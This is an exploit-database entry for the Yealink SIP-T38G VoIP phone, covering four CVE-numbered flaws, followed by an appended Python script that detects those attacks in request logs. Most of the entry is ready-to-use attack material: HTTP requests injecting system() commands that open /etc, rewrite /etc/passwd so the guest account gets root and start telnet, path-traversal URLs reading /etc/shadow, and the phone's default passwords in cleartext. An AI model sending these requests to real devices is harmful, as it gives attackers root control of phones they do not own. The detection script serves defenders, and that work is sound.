0day.today - Biggest Exploit Database in the World.
Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities
Risk: Security Risk Critical
Title: Yealink VoIP Phone SIP-T38G Privileges Escalation
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5759

Description:
Using the fact that cgiServer.exx runs with root privileges, we use the command execution (CVE-2013-5758) to modify the system file restrictions. Then we add extra privileges to the guest account.

POC:

Step 1 - Change the /etc folder permissions to 777:

POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

system("/bin/busybox%20chmod%20-R%20777%20/etc")

Step 2 - Change the guest user uid:

POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

system("echo "root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:0:0:Guest,,,:/:/bin/sh\" > /etc/passwd ")

Step 3 - Connect back using telnet and the guest account (password is guest):

# id
uid=0(root) gid=0(root)

Enjoy your root shell :)


Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758

Description:
Using cgiServer.exx we are able to send OS commands using the system function.

POC:

POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

system("/bin/busybox%20telnetd%20start")


Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757

Description:
The web interface contains a vulnerability that allows any page to be included. We are able to disclose /etc/passwd & /etc/shadow.

POC:

Using the page parameter (CVE-2013-5756):

http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow

Using the command parameter (CVE-2013-5757):

http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")

*By viewing the shadow file we are able to conclude that cgiServer.exx runs with root privileges. This leads to CVE-2013-5759.


Title: Yealink VoIP Phone SIP-T38G Default Credentials
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5755

Description:
The web interface uses hardcoded default credentials in /config/.htpasswd:

user:s7C9Cx.rLsWFA
admin:uoCbM.VEiKQto
var:jhl3iZAe./qXM

Here are the cleartext passwords for these accounts:

user:user
admin:admin
var:var

--
*Mr.Un1k0d3r** or 1 #*

# 0day.today [2024-09-29] #
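
A defender-side check for the four issues above, as an added example that is not part of the original advisory: it classifies logged requests to cgiServer.exx by the request patterns the advisory describes. The record layout (dicts with url, auth and body, as a reverse proxy or IDS might log them), the function names and the sample records are assumptions made for this example.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

CGI_PATH = "/cgi-bin/cgiServer.exx"
# Default accounts listed in the advisory (CVE-2013-5755).
DEFAULT_CREDS = {"user:user", "admin:admin", "var:var"}

def uses_default_creds(auth_header):
    """True if a Basic Authorization header carries one of the default accounts."""
    scheme, _, token = auth_header.partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return decoded in DEFAULT_CREDS

def classify(request):
    """Return sorted findings for one logged request (dict with url, auth, body)."""
    parts = urlsplit(request["url"])
    if parts.path != CGI_PATH:
        return []
    findings = set()
    if uses_default_creds(request.get("auth", "")):
        findings.add("default credentials (CVE-2013-5755)")
    params = parse_qs(parts.query)
    for value in params.get("page", []):
        # parse_qs decoded once; decode again so %252f-style double encoding is caught.
        if ".." in unquote(value).replace("\\", "/").split("/"):
            findings.add("page traversal (CVE-2013-5756)")
    for value in params.get("command", []):
        if re.search(r"dumpConfigFile\s*\(", value):
            findings.add("dumpConfigFile call (CVE-2013-5757)")
    if re.search(r"system\s*\(", unquote(request.get("body", ""))):
        findings.add("system() call in body (CVE-2013-5758)")
    return sorted(findings)

# Constructed sample records; Status.htm is a made-up benign page name.
SAMPLES = [
    {"url": "/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2fetc%2fpasswd", "auth": "", "body": ""},
    {"url": "/cgi-bin/cgiServer.exx?command=dumpConfigFile(%22/etc/shadow%22)", "auth": "", "body": ""},
    {"url": "/cgi-bin/cgiServer.exx", "auth": "Basic YWRtaW46YWRtaW4=",
     "body": 'system("/bin/busybox%20telnetd%20start")'},
    {"url": "/cgi-bin/cgiServer.exx?page=Status.htm", "auth": "", "body": ""},
]

if __name__ == "__main__":
    for record in SAMPLES:
        print(record["url"], "->", classify(record) or "clean")
```

Any finding on a phone's management interface warrants checking the device for a listening telnet service and for more than one uid 0 entry in /etc/passwd, the two end states the advisory's steps produce.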